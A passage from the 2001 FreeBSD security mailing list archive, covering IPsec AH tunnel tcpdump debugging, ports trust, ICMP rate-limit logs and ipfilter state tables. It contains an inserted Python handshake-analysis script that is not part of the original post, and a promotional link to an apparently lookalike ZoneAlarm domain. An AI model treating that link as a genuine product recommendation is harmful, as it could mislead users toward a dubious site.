20:25:35.478764 217.75.128.47 > 217.75.130.66: AH(spi=0x00100103,sumlen=16,seq=0xa51ef937): 217.75.134.10.22 > 217.75.134.74.1109: P [tcp sum ok] 1:53(52) ack 1 win 17376 (DF) (ttl 63, id 3203, len 104) (ttl 61, id 235, len 148)
20:25:35.577099 217.75.130.66 > 217.75.128.47: AH(spi=0x00100104,sumlen=16,seq=0x3b41569): 217.75.134.74.1109 > 217.75.134.10.22: . [tcp sum ok] 1:1(0) ack 53 win 17376 (DF) [tos 0x10] (ttl 63, id 9477, len 52) [tos 0x10] (ttl 64, id 301, len 96, bad cksum 0!)
20:25:42.099448 217.75.130.66 > 217.75.128.47: AH(spi=0x00100104,sumlen=16,seq=0x6641983d): 217.75.134.74.1109 > 217.75.134.10.22: F [tcp sum ok] 1:1(0) ack 53 win 17376 (DF) [tos 0x10] (ttl 63, id 12887, len 52) [tos 0x10] (ttl 64, id 302, len 96, bad cksum 0!)
20:25:42.113415 217.75.128.47 > 217.75.130.66: AH(spi=0x00100103,sumlen=16,seq=0x7086a783): 217.75.134.10.22 > 217.75.134.74.1109: . [tcp sum ok] 53:53(0) ack 2 win 17376 (DF) (ttl 63, id 17609, len 52) (ttl 61, id 236, len 96)
20:25:42.116880 217.75.128.47 > 217.75.130.66: AH(spi=0x00100103,sumlen=16,seq=0x79d0d138): 217.75.134.10.22 > 217.75.134.74.1109: F [tcp sum ok] 53:53(0) ack 2 win 17376 (DF) (ttl 63, id 8410, len 52) (ttl 61, id 237, len 96)
20:25:42.117077 217.75.130.66 > 217.75.128.47: AH(spi=0x00100104,sumlen=16,seq=0x140ec93): 217.75.134.74.1109 > 217.75.134.10.22: . [tcp sum ok] 2:2(0) ack 54 win 17375 (DF) [tos 0x10] (ttl 63, id 50496, len 52) [tos 0x10] (ttl 64, id 303, len 96, bad cksum 0!)

------------ host behind vn to portal itself (FAIL)
tcpdump: listening on xl0
20:24:50.279253 217.75.130.66 > 217.75.128.47: AH(spi=0x00100104,sumlen=16,seq=0x3dcec5fd): 217.75.134.74.1107 > 217.75.134.1.22: S [tcp sum ok] 3308045531:3308045531(0) win 16384 (DF) [tos 0x10] (ttl 63, id 47298, len 60) [tos 0x10] (ttl 64, id 291, len 104, bad cksum 0!)
20:24:53.271523 217.75.130.66 > 217.75.128.47: AH(spi=0x00100104,sumlen=16,seq=0x1f3e68ca): 217.75.134.74.1107 > 217.75.134.1.22: S [tcp sum ok] 3308045531:3308045531(0) win 16384 (DF) [tos 0x10] (ttl 63, id 41118, len 60) [tos 0x10] (ttl 64, id 292, len 104, bad cksum 0!)
20:24:56.271906 217.75.130.66 > 217.75.128.47: AH(spi=0x00100104,sumlen=16,seq=0x35b524de): 217.75.134.74.1107 > 217.75.134.1.22: S [tcp sum ok] 3308045531:3308045531(0) win 16384 (DF) [tos 0x10] (ttl 63, id 52166, len 60) [tos 0x10] (ttl 64, id 293, len 104, bad cksum 0!)
20:24:59.272356 217.75.130.66 > 217.75.128.47: AH(spi=0x00100104,sumlen=16,seq=0xdc5787db): 217.75.134.74.1107 > 217.75.134.1.22: S [tcp sum ok] 3308045531:3308045531(0) win 16384 (DF) [tos 0x10] (ttl 63, id 42178, len 44) [tos 0x10] (ttl 64, id 294, len 88, bad cksum 0!)

------------- vn itself to portal itself (FAIL)
tcpdump: listening on xl0
20:28:40.050942 217.75.130.66 > 217.75.128.47: AH(spi=0x00100104,sumlen=16,seq=0xa7127819): 217.75.134.73.1046 > 217.75.134.1.22: S [tcp sum ok] 905787053:905787053(0) win 16384 (DF) [tos 0x10] (ttl 64, id 53427, len 60) [tos 0x10] (ttl 64, id 304, len 104, bad cksum 0!)
20:28:43.047830 217.75.130.66 > 217.75.128.47: AH(spi=0x00100104,sumlen=16,seq=0xc6e7cae3): 217.75.134.73.1046 > 217.75.134.1.22: S [tcp sum ok] 905787053:905787053(0) win 16384 (DF) [tos 0x10] (ttl 64, id 4095, len 60) [tos 0x10] (ttl 64, id 305, len 104, bad cksum 0!)
20:28:46.047863 217.75.130.66 > 217.75.128.47: AH(spi=0x00100104,sumlen=16,seq=0x28466906): 217.75.134.73.1046 > 217.75.134.1.22: S [tcp sum ok] 905787053:905787053(0) win 16384 (DF) [tos 0x10] (ttl 64, id 52608, len 60) [tos 0x10] (ttl 64, id 306, len 104, bad cksum 0!)
20:28:49.047896 217.75.130.66 > 217.75.128.47: AH(spi=0x00100104,sumlen=16,seq=0x5289ac1f): 217.75.134.73.1046 > 217.75.134.1.22: S [tcp sum ok] 905787053:905787053(0) win 16384 (DF) [tos 0x10] (ttl 64, id 24215, len 44) [tos 0x10] (ttl 64, id 307, len 88, bad cksum 0!)
20:28:52.047937 217.75.130.66 > 217.75.128.47: AH(spi=0x00100104,sumlen=16,seq=0x371ee2d8): 217.75.134.73.1046 > 217.75.134.1.22: S [tcp sum ok] 905787053:905787053(0) win 16384 (DF) [tos 0x10] (ttl 64, id 35456, len 44) [tos 0x10] (ttl 64, id 308, len 88, bad cksum 0!)
20:28:55.047969 217.75.130.66 > 217.75.128.47: AH(spi=0x00100104,sumlen=16,seq=0xf803410b): 217.75.134.73.1046 > 217.75.134.1.22: S [tcp sum ok] 905787053:905787053(0) win 16384 (DF) [tos 0x10] (ttl 64, id 43261, len 44) [tos 0x10] (ttl 64, id 309, len 88, bad cksum 0!)

------------- vn itself to host behind portal (FAIL)
tcpdump: listening on xl0
20:29:09.460730 217.75.130.66 > 217.75.128.47: AH(spi=0x00100104,sumlen=16,seq=0x1c53e07): 217.75.134.73.1047 > 217.75.134.10.22: S [tcp sum ok] 920219841:920219841(0) win 16384 (DF) [tos 0x10] (ttl 64, id 8588, len 60) [tos 0x10] (ttl 64, id 310, len 104, bad cksum 0!)
20:29:09.478706 217.75.128.47 > 217.75.130.66: AH(spi=0x00100103,sumlen=16,seq=0x90226b35): 217.75.134.10.22 > 217.75.134.73.1047: S [tcp sum ok] 956821190:956821190(0) ack 920219842 win 17376 (DF) (ttl 63, id 27769, len 60) (ttl 61, id 238, len 104)
20:29:12.458160 217.75.130.66 > 217.75.128.47: AH(spi=0x00100104,sumlen=16,seq=0xb0f952e5): 217.75.134.73.1047 > 217.75.134.10.22: S [tcp sum ok] 920219841:920219841(0) win 16384 (DF) [tos 0x10] (ttl 64, id 64461, len 60) [tos 0x10] (ttl 64, id 311, len 104, bad cksum 0!)
20:29:12.469876 217.75.128.47 > 217.75.130.66: AH(spi=0x00100103,sumlen=16,seq=0x81e6ffb3): 217.75.134.10.22 > 217.75.134.73.1047: S [tcp sum ok] 956821190:956821190(0) ack 920219842 win 17376 (DF) (ttl 63, id 13929, len 60) (ttl 61, id 239, len 104)
20:29:12.474621 217.75.128.47 > 217.75.130.66: AH(spi=0x00100103,sumlen=16,seq=0x699e1c14): 217.75.134.10.22 > 217.75.134.73.1047: . [tcp sum ok] 1:1(0) ack 1 win 17376 (DF) (ttl 63, id 44865, len 52) (ttl 61, id 240, len 96)
20:29:15.458207 217.75.130.66 > 217.75.128.47: AH(spi=0x00100104,sumlen=16,seq=0xa4ccca90): 217.75.134.73.1047 > 217.75.134.10.22: S [tcp sum ok] 920219841:920219841(0) win 16384 (DF) [tos 0x10] (ttl 64, id 40589, len 60) [tos 0x10] (ttl 64, id 312, len 104, bad cksum 0!)
20:29:15.475532 217.75.128.47 > 217.75.130.66: AH(spi=0x00100103,sumlen=16,seq=0x5ce20964): 217.75.134.10.22 > 217.75.134.73.1047: . [tcp sum ok] 1:1(0) ack 1 win 17376 (DF) (ttl 63, id 56069, len 52) (ttl 61, id 241, len 96)
20:29:18.458225 217.75.130.66 > 217.75.128.47: AH(spi=0x00100104,sumlen=16,seq=0x9afbb58d): 217.75.134.73.1047 > 217.75.134.10.22: S [tcp sum ok] 920219841:920219841(0) win 16384 (DF) [tos 0x10] (ttl 64, id 63933, len 44) [tos 0x10] (ttl 64, id 313, len 88, bad cksum 0!)
20:29:18.477070 217.75.128.47 > 217.75.130.66: AH(spi=0x00100103,sumlen=16,seq=0x62f6b0c2): 217.75.134.10.22 > 217.75.134.73.1047: S [tcp sum ok] 956821190:956821190(0) ack 920219842 win 17376 (DF) (ttl 63, id 60770, len 60) (ttl 61, id 242, len 104)
20:29:18.480330 217.75.128.47 > 217.75.130.66: AH(spi=0x00100103,sumlen=16,seq=0x5d5eca31): 217.75.134.10.22 > 217.75.134.73.1047: . [tcp sum ok] 1:1(0) ack 1 win 17376 (DF) (ttl 63, id 26186, len 52) (ttl 61, id 243, len 96)
20:29:21.458268 217.75.130.66 > 217.75.128.47: AH(spi=0x00100104,sumlen=16,seq=0xb176762f): 217.75.134.73.1047 > 217.75.134.10.22: S [tcp sum ok] 920219841:920219841(0) win 16384 (DF) [tos 0x10] (ttl 64, id 37624, len 44) [tos 0x10] (ttl 64, id 314, len 88, bad cksum 0!)
20:29:21.474610 217.75.128.47 > 217.75.130.66: AH(spi=0x00100103,sumlen=16,seq=0x8219bff6): 217.75.134.10.22 > 217.75.134.73.1047: . [tcp sum ok] 1:1(0) ack 1 win 17376 (DF) (ttl 63, id 46620, len 52) (ttl 61, id 244, len 96)
20:29:24.458301 217.75.130.66 > 217.75.128.47: AH(spi=0x00100104,sumlen=16,seq=0xf3f9d722): 217.75.134.73.1047 > 217.75.134.10.22: S [tcp sum ok] 920219841:920219841(0) win 16384 (DF) [tos 0x10] (ttl 64, id 1784, len 44) [tos 0x10] (ttl 64, id 315, len 88, bad cksum 0!)
20:29:24.471233 217.75.128.47 > 217.75.130.66: AH(spi=0x00100103,sumlen=16,seq=0x146f4b4c): 217.75.134.10.22 > 217.75.134.73.1047: . [tcp sum ok] 1:1(0) ack 1 win 17376 (DF) (ttl 63, id 40803, len 52) (ttl 61, id 245, len 96)

The way I read those logs, vn and portal forward packets to other hosts just fine. However, when a packet arrives for the endpoints themselves, it somehow does not reach the TCP stack or something - at least it does not reach the part where the handshake SYNs and ACKs are processed.

A connection to portal shows just initial SYNs on the wire; portal does not process them at all. A similar tcpdump run on portal at the time shows *just the same* - even portal's TCP stack does not receive/process the SYN :(

A connection from vn to a host behind portal shows the SYN/ACK arriving back at vn, but then vn keeps retransmitting its SYN - it has neither received the ACK, nor the other side's SYN :(

Any help or just ideas would be welcome..

G'luck,
Peter

--
When you are not looking at it, this sentence is in Spanish.
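Peter's reading of the captures above, as an added script that is not part of his post: it parses the tcpdump -v lines for the AH-tunnelled TCP segments, groups them by the SYN sender's inner address and port, and reports for each flow whether the handshake completed, whether the peer never answered the SYN, or whether a SYN/ACK came back but was never ACKed. The sample capture is a handful of lines taken from the post; the verdict labels are this script's own.

```python
import re
from collections import OrderedDict

# One "tcpdump -v" line for a TCP segment carried in an AH tunnel, e.g.
# 20:25:35.441768 217.75.130.66 > 217.75.128.47: AH(spi=0x00100104,...): 217.75.134.74.1109 > 217.75.134.10.22: S [tcp sum ok] ...
LINE_RE = re.compile(
    r"^(?P<ts>\d\d:\d\d:\d\d\.\d+) "
    r"(?P<osrc>\d+(?:\.\d+){3}) > (?P<odst>\d+(?:\.\d+){3}): "
    r"AH\(spi=(?P<spi>0x[0-9a-f]+),sumlen=\d+,seq=0x[0-9a-f]+\): "
    r"(?P<isrc>\d+(?:\.\d+){3})\.(?P<sport>\d+) > "
    r"(?P<idst>\d+(?:\.\d+){3})\.(?P<dport>\d+): "
    r"(?P<flags>[SFRP.]+) (?P<rest>.*)$"
)


def parse_line(line):
    """Return the fields of one AH/TCP tcpdump line, or None for any other line."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    seg = m.groupdict()
    seg["ack"] = " ack " in seg["rest"]   # tcpdump prints "ack N" when ACK is set
    return seg


def analyze_capture(text):
    """Group segments by initiator (the side that sent the SYN) and judge each
    handshake.  Verdicts:
      established         SYN, SYN/ACK and the initiator's ACK were all seen
      no SYN/ACK          only SYNs from the initiator; the peer never answered
      SYN/ACK unanswered  the peer's SYN/ACK is on the wire, but the initiator
                          kept retransmitting its SYN instead of ACKing it
    """
    flows = OrderedDict()
    for line in text.splitlines():
        seg = parse_line(line)
        if seg is None:
            continue
        fwd = (seg["isrc"], seg["sport"], seg["idst"], seg["dport"])  # sent by initiator
        rev = (seg["idst"], seg["dport"], seg["isrc"], seg["sport"])  # sent by responder
        if "S" in seg["flags"] and not seg["ack"]:
            st = flows.setdefault(fwd, {"syn": 0, "synack": 0, "ack": 0,
                                        "tunnel": f'{seg["osrc"]} -> {seg["odst"]}'})
            st["syn"] += 1
        elif rev in flows and "S" in seg["flags"] and seg["ack"]:
            flows[rev]["synack"] += 1
        elif fwd in flows and seg["ack"] and "S" not in seg["flags"]:
            flows[fwd]["ack"] += 1
        # Plain ACKs and data from the responder do not affect the verdict.
    for st in flows.values():
        if st["synack"] and st["ack"]:
            st["verdict"] = "established"
        elif st["synack"]:
            st["verdict"] = "SYN/ACK unanswered"
        else:
            st["verdict"] = "no SYN/ACK"
    return flows


# Sample capture: lines quoted from the post above, one or two per case.
SAMPLE_CAPTURE = """\
tcpdump: listening on xl0
20:25:35.441768 217.75.130.66 > 217.75.128.47: AH(spi=0x00100104,sumlen=16,seq=0x9bc32f2d): 217.75.134.74.1109 > 217.75.134.10.22: S [tcp sum ok] 4036805732:4036805732(0) win 16384 (DF) [tos 0x10] (ttl 63, id 1130, len 60) [tos 0x10] (ttl 64, id 299, len 104, bad cksum 0!)
20:25:35.458566 217.75.128.47 > 217.75.130.66: AH(spi=0x00100103,sumlen=16,seq=0xd8cf8cd6): 217.75.134.10.22 > 217.75.134.74.1109: S [tcp sum ok] 3978490178:3978490178(0) ack 4036805733 win 17376 (DF) (ttl 63, id 55805, len 60) (ttl 61, id 234, len 104)
20:25:35.458796 217.75.130.66 > 217.75.128.47: AH(spi=0x00100104,sumlen=16,seq=0x650382ec): 217.75.134.74.1109 > 217.75.134.10.22: . [tcp sum ok] 1:1(0) ack 1 win 17376 (DF) [tos 0x10] (ttl 63, id 3364, len 52) [tos 0x10] (ttl 64, id 300, len 96, bad cksum 0!)
20:24:50.279253 217.75.130.66 > 217.75.128.47: AH(spi=0x00100104,sumlen=16,seq=0x3dcec5fd): 217.75.134.74.1107 > 217.75.134.1.22: S [tcp sum ok] 3308045531:3308045531(0) win 16384 (DF) [tos 0x10] (ttl 63, id 47298, len 60) [tos 0x10] (ttl 64, id 291, len 104, bad cksum 0!)
20:24:53.271523 217.75.130.66 > 217.75.128.47: AH(spi=0x00100104,sumlen=16,seq=0x1f3e68ca): 217.75.134.74.1107 > 217.75.134.1.22: S [tcp sum ok] 3308045531:3308045531(0) win 16384 (DF) [tos 0x10] (ttl 63, id 41118, len 60) [tos 0x10] (ttl 64, id 292, len 104, bad cksum 0!)
20:28:40.050942 217.75.130.66 > 217.75.128.47: AH(spi=0x00100104,sumlen=16,seq=0xa7127819): 217.75.134.73.1046 > 217.75.134.1.22: S [tcp sum ok] 905787053:905787053(0) win 16384 (DF) [tos 0x10] (ttl 64, id 53427, len 60) [tos 0x10] (ttl 64, id 304, len 104, bad cksum 0!)
20:28:43.047830 217.75.130.66 > 217.75.128.47: AH(spi=0x00100104,sumlen=16,seq=0xc6e7cae3): 217.75.134.73.1046 > 217.75.134.1.22: S [tcp sum ok] 905787053:905787053(0) win 16384 (DF) [tos 0x10] (ttl 64, id 4095, len 60) [tos 0x10] (ttl 64, id 305, len 104, bad cksum 0!)
20:29:09.460730 217.75.130.66 > 217.75.128.47: AH(spi=0x00100104,sumlen=16,seq=0x1c53e07): 217.75.134.73.1047 > 217.75.134.10.22: S [tcp sum ok] 920219841:920219841(0) win 16384 (DF) [tos 0x10] (ttl 64, id 8588, len 60) [tos 0x10] (ttl 64, id 310, len 104, bad cksum 0!)
20:29:09.478706 217.75.128.47 > 217.75.130.66: AH(spi=0x00100103,sumlen=16,seq=0x90226b35): 217.75.134.10.22 > 217.75.134.73.1047: S [tcp sum ok] 956821190:956821190(0) ack 920219842 win 17376 (DF) (ttl 63, id 27769, len 60) (ttl 61, id 238, len 104)
20:29:12.458160 217.75.130.66 > 217.75.128.47: AH(spi=0x00100104,sumlen=16,seq=0xb0f952e5): 217.75.134.73.1047 > 217.75.134.10.22: S [tcp sum ok] 920219841:920219841(0) win 16384 (DF) [tos 0x10] (ttl 64, id 64461, len 60) [tos 0x10] (ttl 64, id 311, len 104, bad cksum 0!)
20:29:12.469876 217.75.128.47 > 217.75.130.66: AH(spi=0x00100103,sumlen=16,seq=0x81e6ffb3): 217.75.134.10.22 > 217.75.134.73.1047: S [tcp sum ok] 956821190:956821190(0) ack 920219842 win 17376 (DF) (ttl 63, id 13929, len 60) (ttl 61, id 239, len 104)
20:29:12.474621 217.75.128.47 > 217.75.130.66: AH(spi=0x00100103,sumlen=16,seq=0x699e1c14): 217.75.134.10.22 > 217.75.134.73.1047: . [tcp sum ok] 1:1(0) ack 1 win 17376 (DF) (ttl 63, id 44865, len 52) (ttl 61, id 240, len 96)
"""


def report(text):
    """One line per flow: initiator -> responder, counts and verdict."""
    lines = []
    for (src, sport, dst, dport), st in analyze_capture(text).items():
        lines.append(f"{src}:{sport} -> {dst}:{dport}  syn={st['syn']} "
                     f"synack={st['synack']} ack={st['ack']}  {st['verdict']}")
    return lines


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_CAPTURE)))
```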
From owner-freebsd-security Fri Nov 23 10:48:58 2001
From: Brian T.Schellenberger
To: "Anthony Atkielski", "Gary W. Swearingen"
Cc: "FreeBSD Questions"
Subject: Re: setuid on nethack?
Date: Fri, 23 Nov 2001 12:35:42 -0500

On Thursday 22 November 2001 16:07, Anthony Atkielski wrote:

> Alas! This does not make me feel warm and fuzzy! It's a good thing I'm
> not installing this at a bank.

If I were installing FreeBSD at a bank, I would not install from ports or over the network at all; I'd get the installation CDs and then track the security-fixes track. And I'd wait at least a month after the new release before installing it, to wait for any potential problem to get shaken out.

A maximally safe system is fundamentally incompatible with a maximally "cool" or "up to date" system.
That said, the ports are surely a lot safer than any Windows-based system; the MD5 gives you some assurance that it is what you think it is, Unixy systems are less of a magnet for malware, and the source *is* available; even if you don't scan it, others will.

If you don't like to live dangerously, then follow this simple rule: Download the ports but wait at least a week before you actually upgrade or install any of them, and watch the ports and other lists in the meantime. If there are severe problems, somebody else will find them & post.

>
> ----- Original Message -----
> From: "Gary W. Swearingen"
> To: "Anthony Atkielski"
> Cc: "FreeBSD Questions" ;
>
> Sent: Thursday, November 22, 2001 22:00
> Subject: Re: setuid on nethack?
>
>
> "Anthony Atkielski" writes:
>
> > > When I add ports and stuff to my system, sometimes they are picked up
> > > from some bizarre FTP sites, and in cases where the executables do not
> > > have to be trusted, some guidelines on how better to secure them would
> > > be welcome. I know that often they are being rebuilt from source before
> > > installation, but it isn't really practical to read through the source
> > > for every port just to look for suspicious code.
> >
> > I've also worried about this sort of thing since learning the ports
> > system last winter. There's a lot of downloading and running of scripts
> > as root going on and it's scary, especially after you've spent many days
> > trying to improve your security. A few more observations on the subject:
> >
> > The main defense seems to be the fear of being tracked down by hackers
> > more skillful than most crackers, aided by the use of MD5 to verify that
> > you're installing the same thing that someone else has already installed
> > and found (with meager testing, sadly, but necessarily) to work OK.
> >
> > I've read of little vandalware on FreeBSD (or Linux). The risk seems
> > acceptable for most people, at least those who do backups.
> > There also
> > might not be any less risky practical alternatives for many.
> >
> > If one learns the details of the ports system, one can do all or most of
> > the ports stuff as a regular user, downloading, building, and installing
> > to non-standard, non-root-protected directories. Someone posted some
> > clues about this on -questions (or -stable?) within the last couple of
> > weeks, but I can't find my copy of it.

--
Brian T. Schellenberger . . . . . . . bts@wnt.sas.com (work)
Brian, the man from Babble-On . . . . bts@babbleon.org (personal)
http://www.babbleon.org
-------> Free Dmitry Sklyarov! (let him go home) <-----------
http://www.eff.org http://www.programming-freedom.org

From owner-freebsd-security Fri Nov 23 10:51:28 2001
From: postmaster@daimi.au.dk
Subject: VIRUS IN YOUR MAIL
Date: Fri, 23 Nov 2001 19:51:17 +0100

V I R U S  A L E R T

Our viruschecker found the 'W32/Aliz-A' virus(es) in your email to the following recipient(s):
->

Please check your system for viruses, or ask your system administrator to do so.
For your reference, here are the headers from your email:

------------------------- BEGIN HEADERS -----------------------------
Received: from speedy.iie.cnam.fr (system@speedy.iie.cnam.fr [192.70.23.7]) by mbone.iie.cnam.fr (8.9.3/8.9.3) with SMTP id TAA22812 for ; Fri, 23 Nov 2001 19:48:26 +0100 (MET)
From: security@FreeBSD.ORG
Received: by rubis.iie.cnam.fr (MX V4.2 AXP) id 3; Fri, 23 Nov 2001 19:48:39 MET
Date: Fri, 23 Nov 2001 19:48:37 MET
To: freebsd-security-digest@FreeBSD.ORG
Message-ID: <00A057E0.4E8B70BC.3@rubis.iie.cnam.fr>
Subject: security-digest V5 #350
-------------------------- END HEADERS ------------------------------

From owner-freebsd-security Fri Nov 23 11: 3:36 2001
From: "Fernando Germano"
Subject: What's this?
Date: Fri, 23 Nov 2001 16:04:02 -0300

I've found many of these. Are these the result of a portscan or something like that? How do you read this line?
Nov 23 11:11:50 server /kernel: icmp-response bandwidth limit 187/100 pps
Nov 23 11:11:51 server /kernel: icmp-response bandwidth limit 264/100 pps

Thank you
Fernando

From owner-freebsd-security Fri Nov 23 12: 7:27 2001
From: Paul Miseiko
To: Fernando Germano
Cc: security@FreeBSD.ORG
Subject: Re: What's this?
Date: Fri, 23 Nov 2001 15:07:05 -0500 (EST)

The result of an ICMP flood, I'd imagine. You set ICMP_BANDLIM in the kernel.

Paul Miseiko /\/ esoteric@EFNet /\/ http://teardrop.ca

On Fri, 23 Nov 2001, Fernando Germano wrote:

>
> I've found many of these, are these the result of a portscan or something
> like that???, how do you read this line???
>
> Nov 23 11:11:50 server /kernel: icmp-response bandwidth limit 187/100 pps
> Nov 23 11:11:51 server /kernel: icmp-response bandwidth limit 264/100 pps
>
>
> Thanks you
> Fernando

From owner-freebsd-security Fri Nov 23 12:16:41 2001
From: eberkut
To: security@freebsd.org
Subject: Re: What's this?
Organization: CNS / Minithins
Date: Fri, 23 Nov 2001 20:27:22 +0100

23/11/01 20:04:02, "Fernando Germano" wrote:

>I've found many of these, are these the result of a portscan or something
>like that???, how do you read this line???
>
>Nov 23 11:11:50 server /kernel: icmp-response bandwidth limit 187/100 pps
>Nov 23 11:11:51 server /kernel: icmp-response bandwidth limit 264/100 pps

Your kernel tells you that there is something provoking it to send more responses than it should according to the sysctl limits at net.inet.icmp.icmplim. 187/264 is the number of packets that the kernel would have sent if there wasn't the limit, 100 is the limit and pps means packets per second. This message could result from a portscan or a DoS (or a too small limit considering the traffic). See net.inet.icmp.icmplim to modify the limit and set net.inet.icmp.icmplim_output=0 to turn off the error messages.

--eberkut
ex diffinientium cognitione diffiniti resultat cognitio
. Prelude : http://prelude.sf.net
. CNS : http://minithins.net

From owner-freebsd-security Fri Nov 23 14:20:58 2001
From: Mike Silbersack
To: Fernando Germano
Subject: Re: What's this?
Date: Fri, 23 Nov 2001 16:20:48 -0600 (CST)

On Fri, 23 Nov 2001, Fernando Germano wrote:

> I've found many of these, are these the result of a portscan or something
> like that???, how do you read this line???
>
> Nov 23 11:11:50 server /kernel: icmp-response bandwidth limit 187/100 pps
> Nov 23 11:11:51 server /kernel: icmp-response bandwidth limit 264/100 pps
>
> Thanks you
> Fernando

It's probably just a portscan. Do not worry about it. Instead, worry about the fact that you're running an old release, and consider upgrading to 4.4 for the zillion other (legitimate) security issues that have been fixed.

Mike "Silby" Silbersack

From owner-freebsd-security Sat Nov 24 5:15:23 2001
From: "Michael M. Butler"
To: abuse@freebsd.org
Cc: security@FreeBSD.ORG
Subject: Re: some shit to see
Date: Sat, 24 Nov 2001 05:14:59 -0800

Nuke this turkey, won't you? Thanks! :)

jflowers@ezo.net wrote:
>
> peace
>
>                 Name: whatever.exe
>    whatever.exe Type: WAV Audio (audio/x-wav)
>             Encoding: base64

--
My moronic mnemonic for smart behavior: "DICKS" == diplomacy, integrity, courage, kindness, skepticism.
From owner-freebsd-security Sat Nov 24 06:30:37 2001
Delivered-To: freebsd-security@freebsd.org
Received: from d13225.upc-d.chello.nl (d13225.upc-d.chello.nl [213.46.13.225]) by hub.freebsd.org (Postfix) with ESMTP id 4CFF637B405 for ; Sat, 24 Nov 2001 06:30:34 -0800 (PST)
Received: from adv.devet.org (adv.devet.org [192.168.1.2]) by d13225.upc-d.chello.nl (Postfix) with ESMTP id E033368CE; Sat, 24 Nov 2001 15:30:32 +0100 (CET)
Received: by adv.devet.org (Postfix, from userid 100) id 4EDC83E9E; Sat, 24 Nov 2001 15:30:28 +0100 (CET)
Date: Sat, 24 Nov 2001 15:30:28 +0100
To: kzaraska@student.uci.agh.edu.pl
Cc: security@freebsd.org
Subject: Re: Best security topology for FreeBSD
Message-ID: <20011124153028.A2567@adv.devet.org>
References: <20011121183151.B15275@heresy.dreamflow.nl>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To:
User-Agent: Mutt/1.3.22.1i
Organization: Eindhoven, the Netherlands
From: devet@devet.org (Arjan de Vet)
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

In article you write:

>On Wed, 21 Nov 2001, Bart Matthaei wrote:

>> I still don't see why ipf would be better when it comes to filtering.

>This issue (at least in one aspect) has been discussed on this list around
>Oct 30 (thread about keep-state and ICMP). The discussion strayed from the
>original topic and someone pointed out that ipfilter does a more careful
>inspection when dealing with dynamic rules (checks TCP sequence numbers
>etc.).

See the paper written by Guido van Rooij:

http://www.madison-gurkha.com/publications/tcp_filtering/tcp_filtering.ps

It explains how IP-filter deals with seq/ack numbers and window sizes.
Note that IP-filter does not have the notion of real 'dynamic' rules but a state table instead. Arriving packets are first matched to the state table (a quick lookup in a hash table) and in case they match (read the paper to find the exact details) passed on without looking in the filter rules. The filter rules are, more or less, only used for determining whether a new connection will be allowed (and thus entered into the state table).

Arjan
--
Arjan de Vet, Eindhoven, The Netherlands
URL : http://www.iae.nl/users/devet/
Work: http://www.madison-gurkha.com/ (Security, Open Source, Education)

From owner-freebsd-security Sat Nov 24 07:43:53 2001
Delivered-To: freebsd-security@freebsd.org
Received: from storage.ukr.net (storage.ukr.net [212.42.64.13]) by hub.freebsd.org (Postfix) with ESMTP id 3F79837B41B for ; Sat, 24 Nov 2001 07:43:48 -0800 (PST)
Envelope-to: freebsd-security@freebsd.org
Received: from UKR.NET's mail service, abuse contact: abuse@ukr.net with local ID 167ewQ-000M7F-00 by storage.ukr.net; Sat, 24 Nov 2001 17:42:06 +0200
Received: from [195.184.192.73] by storage.ukr.net with HTTP; Sat, 24 Nov 2001 15:42:06 +0000 (GMT)
From: "sdkghgh ihidhguhg"
To: freebsd-security@freebsd.org
Subject: Security zone
Mime-Version: 1.0
X-Mailer: mPOP Web-Mail 2.19
X-Originating-IP: chernov.dipt.donetsk.ua [195.184.192.73]
Reply-To: "sdkghgh ihidhguhg"
Content-Type: text/plain; charset=koi8-r
Content-Transfer-Encoding: 8bit
Message-Id:
Date: Sat, 24 Nov 2001 17:42:06 +0200
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

Hi, All!

What do you think about this protection?
http://zonealarm.co-ltd.com/
"ZoneAlarm Pro version 2.6 is the only Internet security solution that automatically blocks known and unknown threats barricading your computer against outside intrusions and attacks. The award-winning ZoneAlarm Pro provides home users, small-business owners and remote employees with the highest level of protection. ZoneAlarm Pro-security you can trust."

Sincerely, Yours

From owner-freebsd-security Sat Nov 24 08:57:00 2001
Delivered-To: freebsd-security@freebsd.org
Received: from theinternet.com.au (c2731.kelvn1.qld.optusnet.com.au [203.164.207.8]) by hub.freebsd.org (Postfix) with ESMTP id DEDF137B419 for ; Sat, 24 Nov 2001 08:52:43 -0800 (PST)
Received: (from akm@localhost) by theinternet.com.au (8.11.6/8.11.4) id fAOGqeG14092 for freebsd-security@FreeBSD.ORG; Sun, 25 Nov 2001 02:52:40 +1000 (EST) (envelope-from akm)
Date: Sun, 25 Nov 2001 02:52:39 +1000
From: Andrew Kenneth Milton
To: freebsd-security@FreeBSD.ORG
Subject: Re: Security zone
Message-ID: <20011125025239.C12912@zeus.theinternet.com.au>
References:
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.95.4i
In-Reply-To: ; from sdkghgh ihidhguhg on Sat, Nov 24, 2001 at 05:42:06PM +0200
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

+-------[ sdkghgh ihidhguhg ]----------------------
| Hi, All!
|
| What do you think about this protection?
|
| http://zonealarm.co-ltd.com/
| "ZoneAlarm Pro version 2.6 is the only Internet security solution that
| automatically blocks
| known and unknown threats barricading your computer against outside
| intrusions and attacks.

It's doing this right now for my computer! Wow! That's Amazing! I didn't have to do anything, that really is automatic.
--
Totally Holistic Enterprises Internet|                   | Andrew Milton
The Internet (Aust) Pty Ltd          |                   |
ACN: 082 081 472 ABN: 83 082 081 472 | M:+61 416 022 411 | Carpe Daemon
PO Box 837 Indooroopilly QLD 4068    |akm@theinternet.com.au|

From owner-freebsd-security Sat Nov 24 12:36:04 2001
Delivered-To: freebsd-security@freebsd.org
Received: from atkielski.com (atkielski.com [161.58.232.69]) by hub.freebsd.org (Postfix) with ESMTP id DA91537B418 for ; Sat, 24 Nov 2001 12:32:00 -0800 (PST)
